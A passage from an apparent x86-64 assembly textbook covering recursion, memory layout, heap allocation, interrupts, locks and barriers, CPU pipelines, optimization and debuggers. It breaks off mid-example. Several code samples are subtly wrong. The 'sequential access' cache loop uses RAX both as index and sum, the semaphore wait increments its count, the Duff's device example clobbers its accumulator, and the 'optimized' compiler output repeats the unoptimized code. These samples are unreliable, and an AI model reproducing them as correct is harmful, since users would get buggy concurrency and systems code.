    mov rbp, rsp
    
    mov rcx, rdi       ; count
    xor rax, rax       ; total
    
    ; Process registers
    test rcx, rcx
    jz .done_regs
    add rax, rsi       ; add first vararg
    dec rcx
    jz .done_regs
    add rax, rdx
    dec rcx
    jz .done_regs
    add rax, r8
    dec rcx
    jz .done_regs
    add rax, r9
    dec rcx
    jz .done_regs
    
    ; Remaining args on stack
    mov rdx, rcx       ; count left
    lea rsi, [rbp+16]  ; first stack arg
    
.loop_stack:
    add rax, [rsi]
    add rsi, 8
    dec rdx
    jnz .loop_stack
    
.done_regs:
    pop rbp
    ret

10.4 Recursion

Factorial Example

int factorial(int n) {
    if (n <= 1) return 1;
    return n * factorial(n-1);
}

; RDI = n
factorial:
    push rbp
    mov rbp, rsp
    
    cmp edi, 1
    jle .base_case
    
    ; Save n
    push rdi
    
    ; factorial(n-1)
    dec edi
    call factorial
    
    ; Multiply by n
    pop rdi
    imul rax, rdi
    
    jmp .return
    
.base_case:
    mov eax, 1
    
.return:
    pop rbp
    ret

Tail Recursion Optimization

When recursive call is the last operation:

int factorial_tail(int n, int acc) {
    if (n <= 1) return acc;
    return factorial_tail(n-1, acc * n);
}

; RDI = n, RSI = acc
factorial_tail:
    cmp edi, 1
    jle .done
    
    imul rsi, rdi      ; acc *= n
    dec edi            ; n--
    
    ; Tail call optimization - just jump
    jmp factorial_tail ; no new stack frame
    
.done:
    mov rax, rsi
    ret

10.5 Tail Call Optimization

Tail call optimization reuses the current stack frame.

Before Optimization

int func1(int x) {
    return func2(x + 1);
}

func1:
    push rbp
    mov rbp, rsp
    
    inc edi
    call func2
    
    pop rbp
    ret

After Optimization

func1:
    inc edi
    jmp func2         ; jump instead of call/ret

Requirements for TCO:

Call is last instruction before ret
No local variables needed after call
Must preserve stack alignment

10.6 Interfacing with C Libraries

Calling printf from Assembly

; hello.asm - Call printf
section .data
    format db "Hello, %s!", 10, 0
    name db "World", 0

section .text
    global main
    extern printf

main:
    push rbp
    mov rbp, rsp
    
    ; printf(format, name)
    lea rdi, [format]
    lea rsi, [name]
    xor eax, eax       ; 0 floating point args
    call printf
    
    ; return 0
    xor eax, eax
    pop rbp
    ret

Calling Assembly from C

// extern int add(int a, int b);
extern int add(int, int);

int main() {
    int result = add(5, 3);
    printf("%d\n", result);
    return 0;
}

; add.asm
global add

add:
    mov eax, edi
    add eax, esi
    ret

Accessing Global Variables

// C code
extern int global_var;
void set_global(int x) {
    global_var = x;
}

; Assembly
extern global_var

set_global:
    mov [global_var], edi
    ret

PART IV — Memory & System Internals

Chapter 11: Stack, Heap & Memory Layout

11.1 Program Memory Layout

Typical Linux process memory layout:

High addresses (0x7FFFFFFFFFFFFF)
+--------------------------+
|        Stack             |  (grows downward)
|           ↓              |
+--------------------------+
|                          |
|        Memory Mapped     |
|        Region            |
|                          |
+--------------------------+
|           ↑              |
|        Heap              |  (grows upward)
+--------------------------+
|        .bss              |  (uninitialized data)
+--------------------------+
|        .data             |  (initialized data)
+--------------------------+
|        .text             |  (code)
+--------------------------+
|        Reserved          |
Low addresses (0x400000)

Memory Segments

.text: Read-only, executable (code)
.data: Read-write, initialized global/static variables
.bss: Read-write, zero-initialized global/static
Heap: Dynamically allocated memory (malloc)
Stack: Local variables, function call context
Memory mapped: Shared libraries, mmap files

Viewing Process Memory

# View memory map of process
cat /proc/pid/maps

# Example output:
00400000-00401000 r-xp 00000000 08:01 12345    /bin/program
00600000-00601000 r--p 00000000 08:01 12345    /bin/program
00601000-00602000 rw-p 00001000 08:01 12345    /bin/program
7ffff7a00000-7ffff7bc0000 r-xp 00000000 08:01  libc.so
7ffff7bc0000-7ffff7dc0000 ---p 001c0000 08:01  libc.so
7ffff7dc0000-7ffff7dc4000 r--p 001c0000 08:01  libc.so
7ffff7dc4000-7ffff7dc6000 rw-p 001c4000 08:01  libc.so
7ffffffde000-7ffffffff000 rw-p 00000000 00:00  [stack]

11.2 Stack Frames

Detailed stack frame layout:

High addresses
+------------------+ <--- Previous frame
|    Arguments     |
+------------------+
| Return Address   | <--- CALL pushes this
+------------------+
| Saved RBP        | <--- push rbp
+------------------+ <--- RBP
| Local Variables  |
|                  |
+------------------+
|    Padding       | (for alignment)
+------------------+ <--- RSP
Low addresses

Stack Frame Example

int func(int a, int b) {
    int local1 = a + b;
    int local2 = a - b;
    return local1 * local2;
}

func:
    push rbp
    mov rbp, rsp
    sub rsp, 16          ; allocate 16 bytes for locals
    
    mov [rbp-4], edi     ; save a
    mov [rbp-8], esi     ; save b
    
    mov eax, [rbp-4]
    add eax, [rbp-8]
    mov [rbp-12], eax    ; local1 = a+b
    
    mov eax, [rbp-4]
    sub eax, [rbp-8]
    mov [rbp-16], eax    ; local2 = a-b
    
    mov eax, [rbp-12]
    imul eax, [rbp-16]   ; return local1*local2
    
    leave                ; mov rsp, rbp; pop rbp
    ret

Stack Overflow

Occurs when stack grows too large (infinite recursion, large locals):

; This will overflow the stack
infinite_recursion:
    call infinite_recursion
    ret

11.3 Heap Allocation

brk/sbrk System Calls

Traditional heap management:

; Increase heap by 4096 bytes
mov rax, 12          ; brk syscall number
mov rdi, 0           ; get current break
syscall

mov rbx, rax         ; save current break
add rbx, 4096        ; new break
mov rdi, rbx
mov rax, 12          ; brk
syscall

mmap for Large Allocations

Modern malloc uses mmap for large allocations:

; Allocate 1MB with mmap
mov rax, 9           ; mmap syscall
xor rdi, rdi         ; addr = NULL
mov rsi, 0x100000    ; length = 1MB
mov rdx, 3           ; PROT_READ | PROT_WRITE
mov r10, 0x22        ; MAP_PRIVATE | MAP_ANONYMOUS
mov r8, -1           ; fd = -1
xor r9, r9           ; offset = 0
syscall              ; returns address in RAX

Simple Heap Allocator

; Very simple bump allocator
section .bss
heap_start resb 0x100000  ; 1MB heap
heap_ptr   resq 1

section .text
init_heap:
    mov qword [heap_ptr], heap_start
    ret

; Allocate RBX bytes
; Returns pointer in RAX
alloc:
    push rbp
    mov rbp, rsp
    
    ; Align to 16 bytes
    add rbx, 15
    and rbx, ~15
    
    ; Get current pointer
    mov rax, [heap_ptr]
    
    ; Update pointer
    add [heap_ptr], rbx
    
    ; Check overflow (simplified)
    cmp qword [heap_ptr], heap_start + 0x100000
    ja .oom
    
    pop rbp
    ret
    
.oom:
    xor rax, rax
    pop rbp
    ret

11.4 Buffer Management

Buffer Overflows

Dangerous pattern:

; Unsafe string copy
unsafe_copy:
    mov rsi, source
    mov rdi, dest
.copy:
    mov al, [rsi]
    mov [rdi], al
    inc rsi
    inc rdi
    test al, al
    jnz .copy
    ret

Safe Copy

; Safe string copy with bounds checking
; RSI = source, RDI = dest, RDX = max length
safe_copy:
    push rbp
    mov rbp, rsp
    
    xor rcx, rcx
.copy:
    cmp rcx, rdx
    jae .done          ; max length reached
    
    mov al, [rsi + rcx]
    mov [rdi + rcx], al
    
    test al, al
    jz .done           ; null terminator
    
    inc rcx
    jmp .copy
    
.done:
    pop rbp
    ret

11.5 Memory Alignment

Why Alignment Matters

Unaligned accesses can be:

Slower (crosses cache line/page boundary)
Illegal on some architectures
Atomic operation requirement

Alignment Rules

1-byte: any address
2-byte: even address
4-byte: multiple of 4
8-byte: multiple of 8
16-byte: multiple of 16 (SSE)
32-byte: multiple of 32 (AVX)

Ensuring Alignment

; Align stack
and rsp, ~15          ; align to 16 bytes

; Align allocation
add rax, 15
and rax, ~15

; Data alignment in data section
section .data
align 16
vector: dd 1.0, 2.0, 3.0, 4.0

11.6 Cache Architecture

Cache Levels

Modern CPU cache hierarchy:

CPU Core
    |
    v
L1 Cache (32KB instruction + 32KB data)
    | (fast, ~4 cycles)
    v
L2 Cache (256KB-1MB unified)
    | (faster, ~12 cycles)
    v
L3 Cache (8MB-30MB shared)
    | (fast, ~30 cycles)
    v
Main Memory (several GB)
    | (slow, ~200+ cycles)
    v
Disk (virtual memory)

Cache Lines

Memory transferred in cache lines (typically 64 bytes):

; Access pattern matters
; Bad: striding through memory
mov rcx, 1000
xor rax, rax
.loop:
    add rax, [rsi + rcx*8]  ; random access pattern
    loop .loop

; Good: sequential access
mov rcx, 1000
xor rax, rax
.loop:
    add rax, [rsi + rax*8]  ; sequential
    add rsi, 8
    loop .loop

Cache-Friendly Code

Spatial locality: Access nearby memory
Temporal locality: Reuse data while cached
Stride patterns: Avoid large strides

Matrix Multiplication Example

Bad (column-major access):

; Access pattern: matrix[j][i] - poor locality
    xor rcx, rcx
.outer:
    xor rdx, rdx
.inner:
    mov rax, [matrix + rcx*8 + rdx*8000]  ; large stride
    inc rdx
    cmp rdx, 1000
    jl .inner
    inc rcx
    cmp rcx, 1000
    jl .outer

Good (row-major access):

; Access pattern: matrix[i][j] - good locality
    xor rcx, rcx
.outer:
    xor rdx, rdx
.inner:
    mov rax, [matrix + rcx*8000 + rdx*8]  ; sequential
    inc rdx
    cmp rdx, 1000
    jl .inner
    inc rcx
    cmp rcx, 1000
    jl .outer

Cache Blocking (Tiling)

// Cache blocking for matrix multiplication
for (int i = 0; i < N; i += BLOCK)
    for (int j = 0; j < N; j += BLOCK)
        for (int k = 0; k < N; k += BLOCK)
            // Multiply block
            for (int ii = i; ii < i + BLOCK; ii++)
                for (int jj = j; jj < j + BLOCK; jj++)
                    for (int kk = k; kk < k + BLOCK; kk++)
                        C[ii][jj] += A[ii][kk] * B[kk][jj];

Chapter 12: Interrupts & System Calls

12.1 Hardware Interrupts

Hardware interrupts signal events from devices.

Interrupt Vector Table (IVT) in real mode:

256 entries
Each entry: 4 bytes (segment:offset)
Located at physical address 0

Interrupt Descriptor Table (IDT) in protected/long mode:

256 entries
Each entry: 16 bytes (64-bit mode)

IDT Entry Format (64-bit)

Bytes 0-1: Offset low (15:0)
Bytes 2-3: Segment selector
Bytes 4-5: IST (bits 0-2), reserved (bits 3-15)
Bytes 6-7: Type and attributes
    Bit 7: Present
    Bits 6-5: DPL (Descriptor Privilege Level)
    Bit 4: Reserved (0)
    Bits 3-0: Gate Type
        0xE = 64-bit interrupt gate
        0xF = 64-bit trap gate
        0x5 = 32-bit task gate
        0xE = 32-bit interrupt gate
        0xF = 32-bit trap gate
Bytes 8-15: Offset middle (31:16) and high (63:32)

Loading IDT

; Load IDT register
lidt [idtr]

; IDTR format
idtr:
    dw 256*16 - 1     ; limit (size - 1)
    dq idt             ; base address

Common Hardware Interrupts

IRQ0: Programmable Interval Timer
IRQ1: Keyboard
IRQ2: Cascade for IRQ8-15
IRQ3: COM2
IRQ4: COM1
IRQ6: Floppy disk
IRQ8: RTC
IRQ12: PS/2 Mouse
IRQ14: Primary ATA
IRQ15: Secondary ATA

12.2 Software Interrupts

Software interrupts triggered by INT instruction.

INT Instruction

int 0x80             ; software interrupt
int3                 ; breakpoint interrupt (single-byte 0xCC)
into                 ; interrupt on overflow

Common Software Interrupts

INT 0x10: BIOS video services
INT 0x13: BIOS disk services
INT 0x16: BIOS keyboard services
INT 0x21: DOS services
INT 0x80: Linux syscall (32-bit)
INT 0x2E: Windows syscall

12.3 Linux Syscalls

32-bit Linux Syscalls

Using int 0x80:

; Syscall numbers in /usr/include/asm/unistd_32.h
; Arguments: EBX, ECX, EDX, ESI, EDI, EBP
; EAX = syscall number

section .data
    msg db 'Hello', 10
    len equ $ - msg

section .text
    global _start

_start:
    ; write(1, msg, len)
    mov eax, 4         ; sys_write
    mov ebx, 1         ; stdout
    mov ecx, msg
    mov edx, len
    int 0x80
    
    ; exit(0)
    mov eax, 1         ; sys_exit
    xor ebx, ebx
    int 0x80

64-bit Linux Syscalls

Using syscall instruction:

; Syscall numbers in /usr/include/asm/unistd_64.h
; Arguments: RDI, RSI, RDX, R10, R8, R9
; RAX = syscall number
; RCX and R11 are clobbered (RIP and RFLAGS)

section .data
    msg db 'Hello', 10
    len equ $ - msg

section .text
    global _start

_start:
    ; write(1, msg, len)
    mov rax, 1         ; sys_write
    mov rdi, 1         ; stdout
    mov rsi, msg
    mov rdx, len
    syscall
    
    ; exit(0)
    mov rax, 60        ; sys_exit
    xor rdi, rdi
    syscall

Common Syscall Numbers (x86-64)

RAX	Name	RDI	RSI	RDX	R10	R8	R9
0	read	fd	buf	count	-	-	-
1	write	fd	buf	count	-	-	-
2	open	path	flags	mode	-	-	-
3	close	fd	-	-	-	-	-
9	mmap	addr	len	prot	flags	fd	off
10	mprotect	addr	len	prot	-	-	-
12	brk	addr	-	-	-	-	-
39	getpid	-	-	-	-	-	-
57	fork	-	-	-	-	-	-
60	exit	status	-	-	-	-	-
63	uname	buf	-	-	-	-	-

12.4 Windows API Calls

Windows Syscall Mechanism

Windows uses sysenter for fast syscalls (32-bit) and syscall (64-bit).

Calling Windows API

; Windows x64 assembly (MASM)
extern ExitProcess: PROC
extern WriteFile: PROC
extern GetStdHandle: PROC

.data
    msg db "Hello, World!", 13, 10
    len equ $ - msg
    written dq ?

.code
main PROC
    sub rsp, 28h       ; shadow space + alignment
    
    ; GetStdHandle(STD_OUTPUT_HANDLE)
    mov ecx, -11       ; STD_OUTPUT_HANDLE
    call GetStdHandle
    
    ; WriteFile(handle, msg, len, &written, 0)
    mov rcx, rax       ; handle
    lea rdx, msg       ; buffer
    mov r8d, len       ; length
    lea r9, written    ; bytes written
    push 0             ; lpOverlapped (last argument)
    sub rsp, 32        ; shadow space for callee
    call WriteFile
    
    ; ExitProcess(0)
    xor ecx, ecx
    call ExitProcess
    
main ENDP
END

Windows Syscall Numbers

Syscall numbers change between Windows versions. They're found in the System Service Dispatch Table (SSDT).

12.5 Writing Custom Interrupt Handlers

Simple Interrupt Handler (Real Mode)

; Real mode interrupt handler
[org 0x7C00]

; Set up IVT entry for INT 0x40
cli
xor ax, ax
mov ds, ax
mov word [0x100], custom_handler   ; offset
mov word [0x102], cs                ; segment
sti

; Main program
jmp $

custom_handler:
    pusha
    ; Handle interrupt
    mov si, msg
    call print_string
    popa
    iret

msg db "Interrupt handled!", 0

; Print string function
print_string:
    lodsb
    or al, al
    jz .done
    mov ah, 0x0E
    int 0x10
    jmp print_string
.done:
    ret

times 510-($-$$) db 0
dw 0xAA55

Protected Mode IDT Setup

; Set up IDT in protected mode
idt_start:
    ; Interrupt gate for IRQ0 (timer)
    dw handler_timer & 0xFFFF      ; offset low
    dw 0x08                         ; segment selector (code)
    db 0                             ; IST (unused)
    db 0x8E                          ; present, ring 0, interrupt gate
    dw handler_timer >> 16           ; offset high
    dd handler_timer >> 32           ; offset top (64-bit)
    dd 0                              ; reserved
    
    ; ... more entries ...

idt_end:

idtr:
    dw idt_end - idt_start - 1      ; limit
    dd idt_start                     ; base (32-bit)
    
; Load IDT
lidt [idtr]

Interrupt Handler in Protected Mode

; Interrupt handler - must save all registers
handler_timer:
    pusha
    push ds
    push es
    push fs
    push gs
    
    ; Set up kernel data segments
    mov ax, 0x10        ; kernel data selector
    mov ds, ax
    mov es, ax
    
    ; Handle interrupt
    inc dword [timer_ticks]
    
    ; Send EOI to PIC
    mov al, 0x20
    out 0x20, al
    
    ; Restore registers
    pop gs
    pop fs
    pop es
    pop ds
    popa
    
    iret               ; return from interrupt

Interrupt Handler in Long Mode

; 64-bit interrupt handler
handler_timer:
    ; Save all registers
    push rax
    push rbx
    push rcx
    push rdx
    push rsi
    push rdi
    push rbp
    push r8
    push r9
    push r10
    push r11
    push r12
    push r13
    push r14
    push r15
    
    ; Handle interrupt
    inc qword [timer_ticks]
    
    ; Send EOI to APIC
    mov rax, 0
    mov [0xFEE000B0], eax  ; APIC EOI register
    
    ; Restore registers
    pop r15
    pop r14
    pop r13
    pop r12
    pop r11
    pop r10
    pop r9
    pop r8
    pop rbp
    pop rdi
    pop rsi
    pop rdx
    pop rcx
    pop rbx
    pop rax
    
    iretq              ; 64-bit return from interrupt

Chapter 13: Multithreading & Concurrency

13.1 Atomic Instructions

Atomic operations are indivisible - they appear to execute as a single unit.

LOCK Prefix

lock inc dword [counter]   ; atomic increment
lock xadd [counter], eax   ; atomic exchange and add
lock cmpxchg [mem], ebx    ; atomic compare and exchange
lock bts [mem], 5          ; atomic bit test and set

XCHG is Implicitly Locked

xchg eax, [mem]            ; always atomic (LOCK implied)

CMPXCHG (Compare and Exchange)

; Compare EAX with [mem], if equal set [mem]=EBX
; else load [mem] into EAX
lock cmpxchg [mem], ebx

; Example: atomic increment
retry:
    mov eax, [counter]
    mov ebx, eax
    inc ebx
    lock cmpxchg [counter], ebx
    jne retry           ; if EAX != [counter], try again

Atomic Operations in C

// GCC atomic builtins
__sync_fetch_and_add(&counter, 1);
__sync_lock_test_and_set(&flag, 1);
__sync_bool_compare_and_swap(&ptr, old, new);

// C11 atomics
#include <stdatomic.h>
atomic_int counter;
atomic_fetch_add(&counter, 1);

13.2 Locks & Mutexes

Spinlock Implementation

; Simple spinlock
spinlock:
    mov eax, 1
    xchg eax, [lock]    ; try to acquire
    test eax, eax
    jnz spinlock        ; if already locked, spin
    ret

spinunlock:
    mov dword [lock], 0
    ret

Improved Spinlock with PAUSE

spinlock:
    mov eax, 1
    xchg eax, [lock]
    test eax, eax
    jz .acquired        ; got lock
    
.spin:
    pause               ; hint for hyper-threading
    cmp dword [lock], 0
    jne .spin
    jmp spinlock        ; try again
    
.acquired:
    ret

Ticket Lock

Fairer than spinlock:

; Ticket lock structure
struc ticket_lock
    .current resd 1     ; current ticket serving
    .next    resd 1     ; next ticket to issue
endstruc

; Acquire lock
ticket_lock_acquire:
    mov eax, 1
    lock xadd [lock + ticket_lock.next], eax  ; get ticket
    ; EAX now has our ticket number
    
.spin:
    pause
    cmp eax, [lock + ticket_lock.current]
    jne .spin
    ret

; Release lock
ticket_lock_release:
    lock inc dword [lock + ticket_lock.current]
    ret

13.3 Memory Barriers

Memory barriers prevent reordering of memory operations.

MFENCE (Memory Fence)

mfence               ; serializes all memory operations
lfence               ; serializes loads
sfence               ; serializes stores

When Barriers Are Needed

; Producer thread
    mov dword [data], 1
    sfence            ; ensure data visible before flag
    mov dword [flag], 1

; Consumer thread
.wait:
    pause
    cmp dword [flag], 0
    je .wait
    lfence            ; ensure flag read before data
    mov eax, [data]   ; guaranteed to see data=1

13.4 Thread Local Storage

Thread Local Storage (TLS) provides per-thread variables.

x86-64 TLS Implementation

Using FS segment register on Linux:

; Access TLS variable (offset in FS)
mov rax, [fs:0]       ; thread pointer
mov rbx, [fs:tls_var_offset]

Setting FS Base

; Set FS base address (privileged)
mov ecx, 0xC0000100   ; MSR_FS_BASE
mov eax, [thread_struct]  ; low 32 bits
mov edx, [thread_struct+4] ; high 32 bits
wrmsr

; Using WRFSBASE instruction (if CR4.FSGSBASE set)
wrfsbase rax         ; set FS base to RAX

TLS in C

// Thread-local variable
__thread int tls_var;

// Access becomes:
// mov eax, [fs:tls_var_offset]

13.5 Synchronization Primitives

Semaphore Implementation

; Semaphore structure
struc semaphore
    .count resd 1      ; current count
    .waiters resd 1    ; wait queue (simplified)
endstruc

; Wait (P operation)
sem_wait:
    mov eax, 1
.loop:
    lock xadd [sem + semaphore.count], eax
    ; EAX now has old count
    test eax, eax
    jg .acquired       ; count was > 0
    
    ; Need to wait (simplified - should block)
    ; In real OS, would add to wait queue and yield
    
    ; Restore count and try again
    lock add [sem + semaphore.count], 1
    pause
    jmp .loop
    
.acquired:
    ret

; Signal (V operation)
sem_signal:
    lock inc dword [sem + semaphore.count]
    ; Wake up waiters (if any)
    ret

Reader-Writer Lock

; Reader-writer lock structure
struc rwlock
    .readers resd 1    ; number of readers
    .writer  resd 1    ; writer flag
endstruc

; Reader lock
read_lock:
.loop:
    mov eax, [rwlock + rwlock.writer]
    test eax, eax
    jnz .loop          ; writer active, spin
    
    lock inc dword [rwlock + rwlock.readers]
    
    ; Check if writer started while we incremented
    cmp dword [rwlock + rwlock.writer], 0
    je .acquired
    
    ; Writer started, undo increment and retry
    lock dec dword [rwlock + rwlock.readers]
    pause
    jmp .loop
    
.acquired:
    ret

; Reader unlock
read_unlock:
    lock dec dword [rwlock + rwlock.readers]
    ret

; Writer lock
write_lock:
    mov eax, 1
    lock xchg [rwlock + rwlock.writer], eax
    test eax, eax
    jz .acquired       ; got writer lock
    
    ; Wait for readers to finish
.wait:
    pause
    cmp dword [rwlock + rwlock.readers], 0
    jne .wait
    jmp write_lock     ; try to reacquire writer
    
.acquired:
    ret

; Writer unlock
write_unlock:
    mov dword [rwlock + rwlock.writer], 0
    ret

Condition Variable

; Wait on condition
cond_wait:
    ; Must have mutex locked
    ; Release mutex and block
    ; On wake, reacquire mutex
    
    ; Simplified - just spin
    mov eax, [cond]
    test eax, eax
    jz .wait
    ret

; Signal condition
cond_signal:
    mov dword [cond], 1
    ret

PART V — Optimization & Performance Engineering

Chapter 14: CPU Pipelines & Execution

14.1 Instruction Pipeline

A pipeline allows multiple instructions to be processed simultaneously.

Classic 5-Stage RISC Pipeline

Stage 1: IF (Instruction Fetch)
Stage 2: ID (Instruction Decode)
Stage 3: EX (Execute)
Stage 4: MEM (Memory Access)
Stage 5: WB (Write Back)

Clock 1: IF1
Clock 2: ID1  IF2
Clock 3: EX1  ID2  IF3
Clock 4: MEM1 EX2  ID3  IF4
Clock 5: WB1  MEM2 EX3  ID4  IF5

x86 Pipeline Complexity

Modern x86 pipelines have 14-20+ stages:

Frontend: Fetch, decode, micro-op generation
Out-of-order engine: Register renaming, scheduler
Execution: Multiple execution units
Retirement: Reorder buffer, commit

14.2 Superscalar Architecture

Superscalar processors can execute multiple instructions per cycle.

Issue Width

Pentium: 2 instructions
Core architecture: 4-6 micro-ops
Modern CPUs: 4-8 micro-ops

Execution Units

Typical modern CPU:

2-4 integer ALUs
2-3 load/store units
2-3 FP/SIMD units
Branch units

Resource Constraints

; Can execute together (different units)
add eax, ebx      ; ALU0
mov [mem], ecx    ; Store unit
addsd xmm0, xmm1  ; FP unit

; May conflict (same unit)
add eax, ebx      ; ALU0
sub ecx, edx      ; ALU0 (needs next cycle)

14.3 Branch Prediction

Branches can stall the pipeline if mispredicted.

Static Prediction

Older CPUs used simple rules:

Forward branches: not taken
Backward branches: taken (loop)

Dynamic Prediction

Modern CPUs use sophisticated predictors:

Branch Target Buffer (BTB)
Global history
Pattern history tables

Branch Prediction Example

; Well-predicted loop
    mov ecx, 1000
.loop:
    ; do work
    dec ecx
    jnz .loop        ; taken 999 times, not taken once

; Hard-to-predict branch
    cmp eax, ebx
    je .target       ; random data makes prediction difficult

Avoiding Branches

Use conditional moves for simple branches:

; Instead of:
    cmp eax, ebx
    jg .greater
    mov ecx, edx
    jmp .done
.greater:
    mov ecx, esi
.done:

; Use:
    cmp eax, ebx
    cmovg ecx, esi   ; if >, use esi
    cmovle ecx, edx  ; if <=, use edx

14.4 Out-of-Order Execution

Out-of-order execution allows instructions to execute when operands ready.

Example

; In-order execution would stall:
mov eax, [mem]      ; long latency load
add ebx, eax        ; must wait for eax
add ecx, edx        ; independent, but blocked in-order

; Out-of-order can execute:
mov eax, [mem]      ; starts, then stalls waiting for cache
add ecx, edx        ; executes while waiting
add ebx, eax        ; executes when eax ready

Register Renaming

Eliminates false dependencies:

; Write-after-write (WAW) dependency
add eax, ebx
mov eax, ecx        ; can rename to different physical register

; Write-after-read (WAR) dependency
mov eax, [mem]
add ebx, eax
mov eax, edx        ; can rename

Reorder Buffer (ROB)

Tracks instruction state until retirement:

Allocates entry for each instruction
Holds results until commit
Enables precise exceptions

14.5 Micro-ops

CISC instructions are broken into simpler micro-ops.

x86 to Micro-op Translation

; Complex instruction:
add eax, [mem]      ; breaks into:
; micro-op 1: load from mem into temp
; micro-op 2: add temp to eax

Micro-op Fusion

Multiple micro-ops can be fused:

; Macro-op fusion
cmp eax, ebx
je .target          ; fuses into single compare-and-branch micro-op

; Micro-op fusion
add eax, [mem]      ; fused load+add micro-op

Micro-op Cache

Caches decoded micro-ops to bypass frontend:

Faster than re-decoding
Power efficient
Typical size: 1.5K-6K micro-ops

Chapter 15: Performance Optimization

15.1 Register Optimization

Register Allocation

Prioritize register usage:

Most frequent variables in registers
Avoid spilling to stack
Use callee-saved registers for persistent values

Zeroing Idioms

; Best: xor same register
xor eax, eax        ; 2 bytes, recognized by CPU

; Good: sub same register
sub eax, eax        ; 2 bytes

; Avoid: mov immediate
mov eax, 0          ; 5 bytes, slower

Register Selection

; Good: use smaller registers when possible
mov al, 1           ; instead of mov eax, 1
add bl, cl          ; instead of add ebx, ecx

; But avoid partial register stalls
mov al, [mem]       ; partial write, then
add eax, ebx        ; stall waiting for upper bytes

15.2 Loop Unrolling

Reduce loop overhead by doing more work per iteration.

Before Unrolling

    mov ecx, 1000
    xor eax, eax
.loop:
    add eax, [rsi]
    add rsi, 4
    dec ecx
    jnz .loop

After Unrolling (4x)

    mov ecx, 250      ; 1000/4 iterations
    xor eax, eax
.loop:
    add eax, [rsi]
    add eax, [rsi+4]
    add eax, [rsi+8]
    add eax, [rsi+12]
    add rsi, 16
    dec ecx
    jnz .loop

Duff's Device in Assembly

; Handle remainder with jump table
    mov ecx, 1000
    mov eax, 1000
    and eax, 3        ; remainder
    jmp [jump_table + eax*8]
    
jump_table:
    dq .case0
    dq .case1
    dq .case2
    dq .case3

.case3:
    add eax, [rsi]
    add rsi, 4
    dec ecx
.case2:
    add eax, [rsi]
    add rsi, 4
    dec ecx
.case1:
    add eax, [rsi]
    add rsi, 4
    dec ecx
.case0:
    ; main loop

15.3 SIMD Vectorization

Process multiple data elements with one instruction.

SSE Example: Adding Arrays

; Add 4 floats at a time
    mov ecx, 1024      ; array size
    shr ecx, 2         ; 1024/4 iterations
    xor rsi, rsi
    
.loop:
    movaps xmm0, [array1 + rsi]
    addps xmm0, [array2 + rsi]
    movaps [result + rsi], xmm0
    add rsi, 16        ; 4 floats * 4 bytes
    dec ecx
    jnz .loop

AVX Example: 8 Floats

    vmovaps ymm0, [array1 + rsi]
    vaddps ymm0, ymm0, [array2 + rsi]
    vmovaps [result + rsi], ymm0

Automatic Vectorization

Compilers can auto-vectorize:

// Compiler may generate SIMD
for (int i = 0; i < 1024; i++) {
    c[i] = a[i] + b[i];
}

15.4 Cache Optimization

Prefetching

; Software prefetch
    prefetcht0 [rsi + 64]   ; prefetch into all cache levels
    prefetcht1 [rsi + 128]  ; prefetch into L2 and L3
    prefetcht2 [rsi + 192]  ; prefetch into L3 only
    prefetchnta [rsi + 256] ; prefetch into L1, minimize cache pollution

Cache Blocking Example

; Matrix multiplication with blocking
    mov rbx, N
    mov rcx, BLOCK
    
.outer_block:
    mov rdx, N
.outer_block_j:
    mov rsi, N
.outer_block_k:
    
    ; Multiply block
    mov r8, rcx        ; block size
.inner_i:
    mov r9, r8
.inner_j:
    ; Compute one element
    dec r9
    jnz .inner_j
    dec r8
    jnz .inner_i
    
    add rsi, BLOCK
    cmp rsi, rdx
    jl .outer_block_k
    
    add rdx, BLOCK
    cmp rdx, rbx
    jl .outer_block_j

Data Alignment

; Align data to cache line boundaries
section .data
align 64
cache_aligned_data:
    times 1024 dq 0

15.5 Profiling & Benchmarking

RDTSC Timing

; Measure cycles
    rdtsc
    mov [start_lo], eax
    mov [start_hi], edx
    
    ; Code to measure
    
    rdtsc
    sub eax, [start_lo]
    sbb edx, [start_hi]
    ; EDX:EAX = cycles

Performance Counter Access

; Read performance counter
    mov ecx, 0        ; counter number
    rdpmc             ; read EDX:EAX

Profiling with perf

# Sample on counter overflow
perf record -e cycles ./program
perf report

# Cache misses
perf stat -e cache-misses ./program

15.6 Reverse Engineering Compiler Optimizations

Examining Compiler Output

# Generate assembly listing
gcc -S -O2 program.c -o program.s

# With Intel syntax
gcc -S -O2 -masm=intel program.c

Common Compiler Optimizations

Constant folding:

// Original
int x = 10 + 20;

// Optimized
int x = 30;

Constant propagation:

// Original
int a = 5;
int b = a * 2;

// Optimized
int b = 10;

Strength reduction:

// Original
x * 8

// Optimized
x << 3

// Original
x / 4

// Optimized (unsigned)
x >> 2

Common subexpression elimination:

// Original
a = b * c + d;
e = b * c + f;

// Optimized
t = b * c;
a = t + d;
e = t + f;

Compiler Optimizations in Assembly

; Original C: *p++ = *q++ + 1
; Unoptimized:
    mov eax, [rsi]
    add eax, 1
    mov [rdi], eax
    add rsi, 4
    add rdi, 4

; Optimized (-O2):
    mov eax, [rsi]
    add eax, 1
    mov [rdi], eax
    add rsi, 4
    add rdi, 4
    ; (similar, but may reorder or use different registers)

PART VI — Reverse Engineering & Security

Chapter 16: Disassembly & Debugging

16.1 GDB (GNU Debugger)

Basic Commands

# Start debugging
gdb ./program

# Set breakpoint
break main
break *0x4004a6

# Run program
run
run arg1 arg2

# Examine registers
info registers
print $rax
x/x $rsp          # examine memory

# Step through
stepi             # instruction step
nexti             # step over calls
continue          # continue execution

# Disassemble
disas main
disas /r main     # show raw bytes

# Examine memory
x/10x $rsp        # 10 hex words
x/10i $rip        # 10 instructions

GDB Scripting

# gdb.py - Python scripting
import gdb

class TraceCalls(gdb.Command):
    """Trace function calls"""
    def __init__(self):
        super(TraceCalls, self).__init__("trace-calls", gdb.COMMAND_USER)

    def invoke(self, arg, from_tty):
        gdb.execute("break *0x4004a6")
        gdb.execute("commands\n silent\n print $rax\n continue\n end")

TraceCalls()

16.2 WinDbg

Windows debugger commands:

# Set breakpoint
bp kernel32!CreateFileW

# Run
g

# Registers
r
r rax

# Memory
db address        # display bytes
dd address        # display dwords
dq address        # display qwords

# Disassemble
u address
u rip L20         # 20 instructions

# Stack
k                 # call stack
dv                # local variables

16.3 x64dbg

User-friendly Windows debugger:

Graphical interface
Plugin support
Scriptable
Memory map view
Breakpoint types:
- Software (INT3)
- Hardware (DR0-DR3)
- Memory (guard pages)

16.4 IDA Pro

Advanced disassembler features:

Cross-references
Function identification
Structure reconstruction
FLIRT signatures
Decompiler (Hex-Rays)

IDA Scripting

# IDAPython example
for seg in Segments():
    print(hex(seg), SegName(seg))
    
for func in Functions():
